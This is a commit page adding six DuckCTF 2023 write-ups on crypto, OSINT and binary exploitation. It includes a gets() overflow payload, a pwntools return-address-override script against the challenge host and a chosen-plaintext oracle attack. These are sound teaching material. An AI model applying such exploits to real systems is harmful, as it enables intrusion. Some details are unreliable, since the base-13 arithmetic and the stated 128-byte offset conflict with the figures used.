Skip to content

Commit

Permalink
how about now?
Browse files Browse the repository at this point in the history
  • Loading branch information
LachlanS7 committed Aug 4, 2023
1 parent 3a8b7d8 commit 4a180b6
Show file tree
Hide file tree
Showing 6 changed files with 352 additions and 0 deletions.
33 changes: 33 additions & 0 deletions content/posts/2023/duckctf/based-crypto-challenge.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
---
layout: post
title: A Based Crypto Challenge - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: There's not much to say here other than this challenge is **BASED**.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

As hinted by the challenge title and description, this challenge is just some sort of base encoding. This is further confirmed by looking at the encoded data;

```
8990767883967987868C74768B8B90857A747A8678877981867C8B98
```

To determine the base, let us count the number of distinct symbols. 13! So this is likely to be base 13. There is of course a chance it was some other base where, by chance, the other symbols didn't get used, but let us first try base 13.

To decode base 13, we will need to make some assumptions about how the data was encoded.
1) The encoded data is regular ASCII -- i.e. `0 - 127`;
2) `0-9` in base 13 represents `0-9` in decimal, and `a-c` in base 13 represents `10-12` in decimal;
3) Each character has been encoded into base 13 individually, and the result has been concatenated with the other encoded characters.

From these assumptions, let us consider the minimum number of base 13 digits required to represent an ASCII character -- i.e. how many base 13 characters are needed to represent a number between 0 and 127? Well, one digit will give a range between 0 and 12, and two characters will range from 0 to 195 (as $14^2 - 1 = 195$). Hence we need at least 2 digits to represent all of the standard ASCII characters in base 13. Hence, if we assume that every two characters in the encoded data are one ASCII character, the first character of the encoded data is `89` in base 13, or `113` in decimal and thus `q` in ASCII.

If we follow this process for all other pairs of characters in the encoded data, we get the flag

`quack{dont_assume_encodings}`

#### Cyberchef Usage
Decoding from an arbitrary base can be done on CyberChef through the use of the `From Charcode` ingredient.
40 changes: 40 additions & 0 deletions content/posts/2023/duckctf/easy-overflow.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
---
layout: post
title: Easy Overflow - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I store all of my private data in all of my programs. I mean, why not? It is safe, right...
author: lachlan
categories:
- ctf
- write-ups
- pwn
---

We have been provided with the C code for this challenge;

```C=
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int id = 0;
char name[16] = "";
printf("Input your name: ");
gets(name);
printf("Your name is %s with ID %d.\n", name, id);
if (id == 1179402567) {
printf("%s\n", argv[1]);
}
return 0;
}
```

As we can see, we are using the vulnerable `gets` function. We can use `gets` to overwrite the `id` variable which is just above the `name` variable on the stack. To do this, we need to write 16 bytes into `name` and then our desired value into `id` -- which is `1179402567`. This is easy enough to do. The only friction here is writing `1179402567` into `id` as we must input the ASCII representation for `1179402567`. However, by converting `1179402567` into ASCII we can see that `1179402567` is equal to the ASCII string `FLAG`, which is easy enough to enter by hand. The final potential problem arises from the fact that strings are written to the stack starting at the lowest memory address, and ending at the highest. This is problematic as this binary is little endian, which means that we will have to enter `FLAG` backwards -- again, this is easy to do. This gives our final payload of:
```
aaaaaaaaaaaaaaaaGALF
```

Entering this into the running binary gives us the flag `quack{gets_is_vulnerable}`.
56 changes: 56 additions & 0 deletions content/posts/2023/duckctf/homebrewed-block-cipher.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
---
layout: post
title: Homebrewed Block Cipher - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I have finally created my own, completely secure, cipher. I am so confident that I will even allow you to encrypt your own data with it.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

In this challenge, we are given an oracle that will encrypt our input with a constant key. We are also given a redacted version of the encrypting script.

Reading through the script, we can see that data is encrypted by splitting the data into blocks of two characters, encrypting each block individually (with a redacted function), and then concatenating the output. Furthermore, by connecting to the oracle, we can see that each block gets encrypted to a fixed size of 40 characters.

These observations make the encryption very weak, as if we make a table of what all pairs of characters get encrypted to, we can easily decrypt any encrypted message by splitting the encrypted message into blocks of 40 characters, and looking for the corresponding plaintext in our lookup table.

The following Python script implements this exact solution

```python=
from pwn import *
from itertools import product
# ================= General Setup =================
conn = remote("chall.duckctf.com", 30002)
# Getting encrypted flag
encryptedFlag = conn.recvline()[16:].strip()
conn.recvline() # Cleaning new line
# Generating all possible pairs of characters in the characterSet
characterSet = list(string.ascii_lowercase + '0{}')
pairs = [p[0] + p[1] for p in product(characterSet, repeat=2)]
# ============ Creating a lookup table ============
# For speed, we just sent all pairs at once
# and split into blocks afterwards. However, we
# could theoretically send each pair one by one
payload = ''.join(pairs)
conn.sendline(bytes(payload, 'utf-8'))
enc = conn.recvline()[32:].strip()
encPairs = [enc[i:i+40] for i in range(0, len(enc), 40)]
table = dict(zip(encPairs, pairs))
# =============== Decrypting Flag ================
# Splitting the encrypted flag into blocks of 40
blocks = [encryptedFlag[i:i+40] for i in range(0, len(encryptedFlag), 40)]
# Searching for each block in lookup table
flag = ''.join([table[block] for block in blocks])
print(flag)
```

This gives the flag `quack{shortblockencryptionbad}`.
80 changes: 80 additions & 0 deletions content/posts/2023/duckctf/not-so-standard-substitution-cipher.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,80 @@
---
layout: post
title: Not So Standard Substitution Cipher - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I made a machine to implement a substitution cipher. The only issue is that it seemed to encrypt everything in sight, including my flag and all other random stuff. Each line in the attached file is a new piece of encoded information. Please save my flag! The flag will not be encased in `quack{...}`, but it will be the only reasonable text.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

We are given a file with 10,000 lines, each of which is a new piece of data encrypted with a substitution cipher with a different key. One of these lines is the flag, and the rest are just random characters.

To filter the rubbish out from the flag, we can use frequency analysis -- as a substitution cipher will not change the frequency of characters.

Ideally, we do not want to be comparing the character frequency distributions by hand. As such, we will want some way to rank each line in terms of their likelihood of being encrypted English -- i.e. some way to compare the frequency of English characters to the frequency of characters in each line. While there are numerous ways to do this, as the mathematician I am, I opted to compute the [Kullback–Leibler divergence](https://en.wikipedia.org/wiki/Kullback%E2%80%93Leibler_divergence) for each line. This quantity is essentially a measure of the difference between two distributions and is given by the equation

$$D_{KL}(P||Q) = -\sum_{x} P(x) \log \left(\frac{Q(x)}{P(x)}\right)$$,

where $P$ and $Q$ are the probability distributions of interest. Hence, if we calculate the probability of each character occurring on each line and apply this formula along with the expected character frequency for English, we should see that the flag has the lowest divergence as it is the only data that is English. The following script does just that;

```python=
from collections import Counter
from math import log
import re
def getProbDist(s):
n = len(s)
freq = Counter(s)
prob = [i/n for i in freq.values()]
prob = sorted(prob, reverse=True)
return prob
def KLD(P,Q):
div = 0
for i in range(min(len(P), len(Q))):
div -= P[i] * log(Q[i] / P[i])
return div
def main():
# ==== Generating Probability Distribution From Sample Text ======
with open('englishSample.txt') as f:
englishSample = f.read().lower()
# Stripping all but a-z characters
englishSample = re.sub(r'[\[]|[^[a-z]]*', r'', englishSample)
targetDist = getProbDist(englishSample)
# Calculating Kullback–Leibler Divergence for each encrypted line
rankings = {}
with open('encrypted.txt') as f:
for line in f:
line = line.strip()
dist = getProbDist(line)
div = KLD(targetDist, dist)
rankings[line] = div
# Printing the most likely English string encrypted
rankings = dict(sorted(rankings.items(), key=lambda item: item[1]))
print(list(rankings.keys())[0])
if __name__ == "__main__":
main()
```

Running this we find the most likely encrypted English string to be
```
tgetrprgrpzvpttgtnkorpehkrzjfkdgkvnbyvyhbtptyvsikfkpttzmkjphhkfnzvrkvrrzpvnfkytkrikhkvxrizjrikjhyxpvhpvkyfyhxkefyriknybhkbiymphrzvrikzfkmvymksyjrkfrikmyrikmyrpnpyvtyfrigfnybhkbyvsqphhpymfzqyviymphrzvtryrktriyrkukfbtdgyfkmyrfplzukfynzmmgryrpukfpvxtgniytrikfkyhzfnzmohklvgmekftzfrikpvrkxkfttyrptjpktprtzqvniyfynrkfptrpnkdgyrpzv
```

Decrypting this using an [online tool](https://www.dcode.fr/monoalphabetic-substitution) gives us
```
substitutionissusceptibletofrequencyanalysisandhereissomefillercontenttoincreasethelengthoftheflaginlinearalgebrathecayleyhamiltontheoremnamedafterthemathematiciansarthurcayleyandwilliamrowanhamiltonstatesthateverysquarematrikoveracommutativeringsuchastherealorcompleknumbersortheintegerssatisfiesitsowncharacteristicequation
```
Which is indeed English text and the flag for the challenge.
110 changes: 110 additions & 0 deletions content/posts/2023/duckctf/return-address-override.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
---
layout: post
title: Return Address Override - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: Ok. So buffer overflows exist, but if I put my data in a different function, my private data will be safe from buffer overflows.
author: lachlan
categories:
- ctf
- write-ups
- pwn
---

This challenge provides us with the binary, so let us begin by printing the objects in the binary with `objdump -t`:

```
SYMBOL TABLE:
0000000000000000 l df *ABS* 0000000000000000 crt1.c
0000000000000000 l df *ABS* 0000000000000000 crtstuff.c
0000000000403e60 l O .ctors 0000000000000000 __CTOR_LIST__
0000000000403e70 l O .dtors 0000000000000000 __DTOR_LIST__
0000000000402070 l O .eh_frame 0000000000000000 __EH_FRAME_BEGIN__
0000000000401090 l F .text 0000000000000000 deregister_tm_clones
00000000004010c0 l F .text 0000000000000000 register_tm_clones
0000000000401100 l F .text 0000000000000000 __do_global_dtors_aux
0000000000404020 l O .bss 0000000000000001 completed.2
0000000000404028 l O .bss 0000000000000008 dtor_idx.1
0000000000401190 l F .text 0000000000000000 frame_dummy
0000000000404040 l O .bss 0000000000000030 object.0
0000000000000000 l df *ABS* 0000000000000000 crtstuff.c
0000000000403e68 l O .ctors 0000000000000000 __CTOR_END__
00000000004020d0 l O .eh_frame 0000000000000000 __FRAME_END__
00000000004012b0 l F .text 0000000000000000 __do_global_ctors_aux
0000000000000000 l df *ABS* 0000000000000000 med.c
0000000000000000 l df *ABS* 0000000000000000
0000000000403e80 l O .dynamic 0000000000000000 _DYNAMIC
0000000000402000 l .eh_frame_hdr 0000000000000000 __GNU_EH_FRAME_HDR
0000000000403fd0 l O .got 0000000000000000 _GLOBAL_OFFSET_TABLE_
0000000000000000 F *UND* 0000000000000000 gets
0000000000404008 g O .data 0000000000000000 .hidden __TMC_END__
0000000000403e78 g O .dtors 0000000000000000 .hidden __DTOR_END__
0000000000000000 F *UND* 0000000000000000 puts
0000000000404000 g O .data 0000000000000000 .hidden __dso_handle
0000000000401000 g F .init 0000000000000001 _init
00000000004011d3 g F .text 00000000000000a0 getName
00000000004011bd g F .text 0000000000000016 win
0000000000401050 g .text 0000000000000000 _start
0000000000401066 g F .text 0000000000000024 _start_c
0000000000404008 g .bss 0000000000000000 __bss_start
0000000000401273 g F .text 000000000000002f main
00000000004012f1 g F .fini 0000000000000001 _fini
0000000000404008 g .data 0000000000000000 _edata
0000000000404078 g .bss 0000000000000000 _end
0000000000000000 F *UND* 0000000000000000 __libc_start_main
0000000000404070 g O .bss 0000000000000008 FLAG
```

As we can see, `gets` is being used, which means this program is likely vulnerable to a buffer overflow with `gets`. So, without trying anything else yet, let us see if we can cause a segfault.

```
python -c "print('a' * 10000)" | ./med
```

Upon running the command above, we get the following error;
```
Segmentation fault (core dumped)
```
Awesome! This means we over-wrote the return address pushed to the stack when calling a function that calls `gets`, and thus when the function tried to return, it returned to a location that does not exist in the binary, therefore throwing an error. Hence, if we work hard enough, we can tell the function to return to a location we desire (perhaps a part of the binary that prints the flag).

To do this, we need to:

1) Determine exactly how many characters are required in our input before we start changing the return address (this is called the offset)
2) Find a location that runs the code we want to run (say print the flag)

The first job is easy enough. We know that 10000 characters is too many, so how about 500? That also segfaults. So how about 250? Yep, still segfaults. What about 100? Nope. Runs fine. 128? Yes. 127? Nope! This means that the offset is 128 characters (it is not 127 as there is a new line character, so when we entered 127 characters, there were really 128 characters sent, all of which did not change the return address). So our payload should be 128 random characters followed by our desired address.

To find a location in the code we might want to jump to, we can look at our symbols table again. We see that there is a function called `win`, and if we look at the assembly for `win` (with `objdump -t`);

```
00000000004011bd <win>:
4011bd: 55 push %rbp
4011be: 48 89 e5 mov %rsp,%rbp
4011c1: 48 8b 05 a8 2e 00 00 mov 0x2ea8(%rip),%rax # 404070 <FLAG>
4011c8: 48 89 c7 mov %rax,%rdi
4011cb: e8 60 fe ff ff call 401030 <puts@plt>
4011d0: 90 nop
4011d1: 5d pop %rbp
4011d2: c3 ret
```

we can see that it will print the flag. So let us jump to `win` which is at address `0x004011bd`.

The following program does just this
```python=
from pwn import *
# Remote
shell = remote('chall.duckctf.com', 30003)
# Local with test flag
#shell = process(['./med', "flag{test flag}"])
winAddress = 0x004011bd
payload = b'a' * 136 + p64(winAddress)
shell.sendline(payload)
shell.interactive()
```

Running this gives the flag `quack{a_simple_return_address_override}`.
33 changes: 33 additions & 0 deletions content/posts/2023/duckctf/the-lost-book.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
---
layout: post
title: The Lost Book - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I run a library, but recently one of my books was returned damaged. Can you please find the book title? *The flag for this challenge is the title of this book in the original language.*
author: lachlan
categories:
- ctf
- write-ups
- osint
---

This challenge only provides the following image of a book cover;
![](https://hackmd.io/_uploads/SJr3_Bqin.jpg)

As we can see, the ISBN is partially corrupted, and the goal is to recover the ISBN and thus recover the book title.

After some quick [googling](https://en.wikipedia.org/wiki/ISBN#Overview), the structure of an ISBN10 code can be found. The following information is relevant;

1) The first digits represent the country of publication,
2) the next few digits represent the publisher,
3) the remaining digits except the final digit specify the book's title and edition,
4) and the final digit is a checksum.

While the specific number of digits in each section varies on the size of the publisher, the country, etc, we can still use this information and the corrupted ISBN provided to recover the book.

First, we can see that the first digit is missing; thus we need to identify the country of publication. As the characters on the book cover are Japanese, it is safe to assume the country is Japan, which has a code of `4`. Thus the first character of the ISBN in `4`.

Next, we need to determine the publisher and their ISBN publisher code. For this, Google Lens comes to our aid! Scanning the book, we can tell that the publisher is [`オーム社 (ohmsha)`](https://www.ohmsha.co.jp/). Searching for this and going to the Japanese publications, we can see that they have published a large variety of books (hence brute-forcing it from here will not work). However, as the publisher code in ISBNs is mostly constant, we can just select any book published by them, and copy the publisher code in the ISBN of the randomly selected book. Doing this will give us the publisher code of `274`. This `2` in `274` aligns with the `2` already given to us in the ISBN: which is a good sign!

Finally, we need to determine the last missing digit. While this could be brute forced, we can also use the checksum in the ISBN (final digit) to recover the final missing digit. While I will not go into details of this here, the checksum calculation is clearly explained in the [Wikipedia article for ISBNs](https://en.wikipedia.org/wiki/ISBN#ISBN-10_check_digits), and reversing it to recover a single digit is a simple exercise in algebra. Doing this gives the final digit of `7`.

Putting all the digits together gives us the final ISBN of `4274066746`. Searching this up on an [ISBN lookup](https://isbnsearch.org/) will give us the book (and flag) `マンガでわかる暗号`, which in English is `Cryptography Understood by Manga`.

0 comments on commit 4a180b6

Please sign in to comment.